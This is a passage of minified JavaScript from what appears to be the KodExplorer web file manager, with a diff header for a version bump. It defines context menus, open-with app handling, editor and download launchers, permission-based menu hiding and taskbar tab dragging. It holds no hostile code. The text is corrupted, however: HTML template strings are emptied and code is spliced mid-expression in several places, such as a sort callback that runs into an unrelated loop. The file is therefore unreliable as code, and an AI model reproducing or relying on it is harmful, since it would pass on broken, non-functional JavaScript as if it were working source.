function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a]; +switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},b=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return b(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
    ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
    '+LNG.unknow_file_tips+"
    "+t+'
    2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
    3.'+r+o+'">'+LNG.unknow_file_download+'
    '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
    ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:10,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("webloc"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()}),Hook.bind("rightMenu.initFinished",function(){if(1!=G.isRoot){var e="hidden";if(core.authCheck("explorer.fileDownload")||(kodApp.remove("browserOpen"),$(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e),$(".context-menu-list .open-browser").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove(),core.authCheck("explorer.mkfile")||$(".context-menu-list .newfile,.tool-path-newfile").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder,[data-action=newfolder]").addClass(e),core.authCheck("explorer.pathCopy")||($(".context-menu-list .cute").addClass(e),$(".context-menu-list .copy").addClass(e)),!core.authCheck("explorer.fileUpload")){$(".context-menu-list .upload").addClass(e);var t=$("[data-action=upload-more]");t.exists()&&t.parent().addClass(e)}}})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/src/app/page",[],function(){var e,t=function(){e=location.hash.split("#",2)[1],e||(e="all"),n(e),$("ul.setting a").click(function(){e!=$(this).attr("data-type")&&(e=$(this).attr("data-type"),n(e))}),$(".app-model [action]").die("click").live("click",function(e){return a($(this).attr("action"),$(this)),$(this).parents(".dropdown-menu").exists()&&$(this).parents(".btn-group").removeClass("open"),stopPP(e)})},a=function(e,t){if("createApp"==e)return window.parent&&window.parent.ui.path.pathOperate.appEdit("","","rootAdd"),void 0;t.hasClass("app-li")||(t=t.parents(".app-li"));var a=t.attr("data-app"),i=jsonDecode(base64Decode(a));switch(e){case"createApp":window.parent&&window.parent.ui.path.pathOperate.appEdit("","","rootAdd");break;case"preview":core.openApp(i);break;case"add":var o="/";ShareData.frameTop("",function(e){o=e.G.thisPath});var s=urlEncode(o+i.name),r=G.appHost+"app/userApp&action=add&path="+s;$.ajax({url:r,dataType:"json",type:"POST",data:{data:urlEncode(jsonEncode(i))},error:core.ajaxError,success:function(e){Tips.tips(e.data,e.code),e.code&&ShareData.frameTop("",function(e){e.ui.f5()})}});break;case"edit":ShareData.frameTop("",function(e){e.ui.path.pathOperate.appEdit(i,"","rootEdit")});break;case"del":$.dialog({id:"dialog_app_remove",icon:"question",padding:20,width:200,lock:!0,background:"#000",opacity:.3,content:LNG.remove_info,ok:function(){$.ajax({url:G.appHost+"app/del&name="+urlEncode(i.name),dataType:"json",error:core.ajaxError,success:function(e){Tips.tips(e.data,e.code),e.code&&n()}})},cancel:!0});break;default:}},i=function(e){var t="",a=" ";G.isRoot||(a="");for(var i in e)if(e[i]){var n=e[i].icon;-1==n.search(G.staticPath)&&"http"!=n.substring(0,4)&&(n=G.staticPath+"images/file_icon/icon_app/"+n),t+="
  • "+e[i].name+"
    "+a+"
  • "}for(var i=0;20>i;i++)t+="
    ";return t+="
    "},n=function(t){(void 0==t||""==t)&&(t=e),$(".selected").removeClass("selected"),$('ul.setting a[data-type="'+t+'"]').addClass("selected"),$(".main").find(".h1").html(""+$(".selected").text());var a=$(".main .app-list");$.ajax({url:G.appHost+"app/get&group="+t,dataType:"json",beforeSend:function(){},success:function(e){a.html(i(e.data)),$("body").scrollTop(0)}})};return{reload:n,init:t}}); \ No newline at end of file diff --git a/static/js/app/src/desktop/main.js b/static/js/app/src/desktop/main.js index 7f4f046..ff7b321 100755 --- a/static/js/app/src/desktop/main.js +++ b/static/js/app/src/desktop/main.js @@ -1,9 +1,9 @@ -/*! power by kodcloud ver4.05(2017-08-26) [build 1503738026262] */ +/*! power by kodcloud ver4.06(2017-08-30) [build 1504089913395] */ define("app/src/desktop/main",["lib/jquery-lib","lib/util","lib/contextMenu/jquery-contextMenu","lib/artDialog/jquery-artDialog","../../common/taskTap","../../common/core","../../common/rightMenuExtence","../../app/appBase","../../app/editor","../../app/openWith","../../app/html","../../common/rightMenu","../explorer/ui","../explorer/fileContent","../../path/path","../../path/pathOperate","../../path/clipboard","../../path/search","../explorer/fileLight","../explorer/fileSelect","../explorer/fileListResize","../explorer/options"],function(e){Config={BodyContent:".bodymain",FileBoxSelector:".bodymain .file-continer",FileBoxClass:".bodymain .file-continer .file",FileBoxClassName:"file",FileBoxTittleClass:".bodymain .file-continer .title",SelectClass:".bodymain .file-continer .file.select",SelectClassName:"select",TypeFolderClass:"folder-box",TypeFileClass:"file-box",HoverClassName:"hover",FileOrderAttr:"number",pageApp:"desktop",navbar:"navbar",AnimateTime:200},e("lib/jquery-lib"),e("lib/util"),e("lib/contextMenu/jquery-contextMenu"),e("lib/artDialog/jquery-artDialog"),TaskTap=e("../../common/taskTap"),core=e("../../common/core"),rightMenu=e("../../common/rightMenu"),ui=e("../explorer/ui"),ui.path=e("../../path/path"),ui.fileLight=e("../explorer/fileLight"),ui.fileSelect=e("../explorer/fileSelect"),ui.fileListResize=e("../explorer/fileListResize"),ui.options=e("../explorer/options"),$(document).ready(function(){rightMenu.initDesktop(),G.userConfig.listType="icon",core.init(),ui.init(),ui.fileLight.init(),ui.fileSelect.init(),TaskTap.init(),ui.fileListResize.initFileSize(),ui.options.init(),$(".init-loading").fadeOut(450).addClass("pop_fadeout"),$(".file-continer").removeClass("hidden"),e.async("lib/webuploader/webuploader-min",function(){core.uploadInit()}),$(".bodymain").click(function(){"block"==$("#menuwin").css("display")&&$("#menuwin").css("display","none"),$("body").focus()}),$(".start").click(function(){"block"==$("#menuwin").css("display")?$("#menuwin").css("display","none"):$("#menuwin").css("display","block")}),$("#menuwin").click(function(){$("#menuwin").css("display","none")}),$(".copyright").click(function(){core.copyright()}),$(".tab-hide-all").click(function(){if(0!=$.dialog.list.length){$(this).toggleClass("this");var e=!$(this).hasClass("this");$.each($.dialog.list,function(t,a){a.display(e)})}});var t='
    ';$("body").append(t);var a=$("#random-wallpaper .flower");a.bind("click",function(){a.addClass("moveCircle");var e=function(e){var t=G.myDesktop+"wallpage/";$.get(G.appHost+"explorer/mkdir&repeat_type=replace&path="+t,function(){$.get(G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e))})};core.api.randomImage(function(t){ui.setWall(t,function(){setTimeout(function(){a.removeClass("moveCircle")},100)}),$.get(G.appHost+"setting/set&k=wall&v="+urlEncode(t)),e(t)})})})}),define("app/common/taskTap",[],function(){var e={},t="",a=160,i=function(){$(".task-tab .tab").die("mouseenter").live("mouseenter",function(){$(this).hasClass("this")||$(this).addClass("hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("hover")})},n=function(e){var t=e.attr("id"),a=$.dialog.list[t];if(void 0==a)return c(t),void 0;var i=$("."+t);"hidden"==i.css("visibility")?a.display(!0).zIndex():i.hasClass("aui-state-focus")?a.display(!1):a.zIndex()},o=function(){var e,t,i,o,s=!1,r=!1,l=0,c=0,d=0,p=0,u=0,f=0;$(".task-tab .tab").die("mousedown").live("mousedown",function(t){1==t.which&&(e=$(this),h(t),this.setCapture&&this.setCapture(),$(document).mousemove(function(e){m(e)}),$(document).one("mouseup",function(t){g(),this.releaseCapture&&this.releaseCapture(),10>Math.abs(t.pageX-l)&&n(e)}))});var h=function(a){s=!0,r=!0,l=a.pageX,$tab_parent=$(".task-tab"),t=$(".task-tab .tab"),$(".tasktab-dragging").remove(),i=e.clone().addClass("tasktab-dragging").prependTo("body"),p=$sizeInt(t.css("margin-right")),u=$tab_parent.width(),f=$tab_parent.get(0).getBoundingClientRect().left,f+=$(window).scrollLeft(),c=e.get(0).getBoundingClientRect().left,d=$sizeInt(t.css("width"));var n=e.get(0).getBoundingClientRect().top-$sizeInt(e.css("margin-top")),o=a.clientX-l+c;$("body").prepend("
    "),i.css({width:d+"px",top:n,left:o}),e.css("opacity",0)},m=function(a){if(r){window.getSelection?window.getSelection().removeAllRanges():document.selection.empty(),0==s&&h(a);var n=a.clientX-l+c;f>n||n>f+u-d||(i.css("left",n),t.each(function(){var t=$(this).get(0).getBoundingClientRect().left;if(n>t&&t+d/2+p>n){if(e.attr("id")==$(this).attr("id"))return;v($(this).attr("id"),"left")}if(n>t-d/2+p&&t>n){if(e.attr("id")==$(this).attr("id"))return;v($(this).attr("id"),"right")}}))}},v=function(i,n){if(!e.is(":animated")||o!=i){o=i,e.stop(!0,!0),$(".insertTemp").remove(),t=$(".task-tab .tab");var s=e.width(),r=$(".task-tab #"+i),l=e.clone(!0).insertAfter(e).css({"margin-right":"0px",border:"none"}).addClass("insertTemp");"left"==n?e.after(r).css("width","0px"):(e.before(r).css("width","0px"),r.before(l)),e.animate({width:s+"px"},a),l.animate({width:"0px"},a,function(){$(this).remove(),t=$(".task-tab .tab")})}},g=function(){r=!1,s=!1,startTime=0,$(".dragMaskView").remove(),void 0!=i&&(c=e.get(0).getBoundingClientRect().left,i.animate({left:c+"px"},a,function(){e.css("opacity",1),$(this).remove()}))}},s=function(e){var t=110,i=t,n=t+12,o=$(".task-tab .tab"),s=$(".task-tab .tabs").width()-10,r=o.length,l=Math.floor(s/n);switch(r>l&&(i=Math.floor(s/r)-12),e){case"add":$(".task-tab .tabs .this").css("width","0").animate({width:i+"px"},a);case"close":o.animate({width:i+"px"},a);break;case"resize":o.css("width",i+"px");break;default:}},r=function(t,a){$(".task-tab").removeClass("hidden");var i=a.replace(/<[^>]+>/g,""),n='";$(n).insertBefore(".task-tab .last"),s("add"),e[t]={id:t,name:name}},l=function(e){$(".task-tab .this").removeClass("this"),$(".task-tab #"+e).addClass("this"),t=e},c=function(t){$(".task-tab #"+t).animate({width:0},a,function(){if($(".task-tab #"+t).remove(),s("close"),0==$(".tabs .tab").length&&!core.isApp("desktop")){var e=31;$(".task-tab").animate({bottom:"-"+e+"px"},200,0,function(){$(this).css({bottom:"0px"}).addClass("hidden")})}}),delete e[t]},d=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-taskbar",items:{"quit-others":{name:LNG.close_others,className:"quit-others",icon:"remove-circle",accesskey:"o"},quit:{name:LNG.close,className:"quit",icon:"remove",accesskey:"q"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"quit-others":$.each($.dialog.list,function(e,t){a!=e&&t.close()});break;case"quit":i.close()}}})},p=function(){$.contextMenu({zIndex:9999,selector:".task-tab",items:{closeAll:{name:LNG.dialog_close_all,icon:"remove-circle",accesskey:"q"},showAll:{name:LNG.dialog_display_all,icon:"th-large",accesskey:"s"},hideAll:{name:LNG.dialog_min_all,icon:"remove",accesskey:"h"}},callback:function(e,t){var a=t.$trigger.attr("id");switch($.dialog.list[a],e){case"showAll":$.each($.dialog.list,function(e,t){t.display(!0)});break;case"hideAll":$.each($.dialog.list,function(e,t){t.display(!1)});break;case"closeAll":$.each($.dialog.list,function(e,t){t.close()});break;default:}}})};return{add:r,focus:l,close:c,init:function(){var e='
    ';$(e).appendTo("body"),core.isApp("desktop")||$(".task-tab").addClass("hidden"),$(window).bind("resize",function(){s("resize")}),i(),d(),p(),o()}}}),define("app/common/core",["./rightMenuExtence","../app/appBase","../app/editor","../app/openWith","../app/html"],function(require,exports){tplUpload=require("./tpl/upload.html"),tplFormMake=require("./tpl/formMake.html");var tools=require("./core.tools"),upload=require("./core.upload"),api=require("./core.api"),playSound=require("./core.playSound"),formMake=require("./core.formMake");require("./rightMenuExtence"),kodApp=require("../app/appBase"),require("../app/editor"),require("../app/openWith"),require("../app/html"),pathHashEncode=function(e){return hashEncode(e)},pathHashDecode=function(e){return hashDecode(e)};var 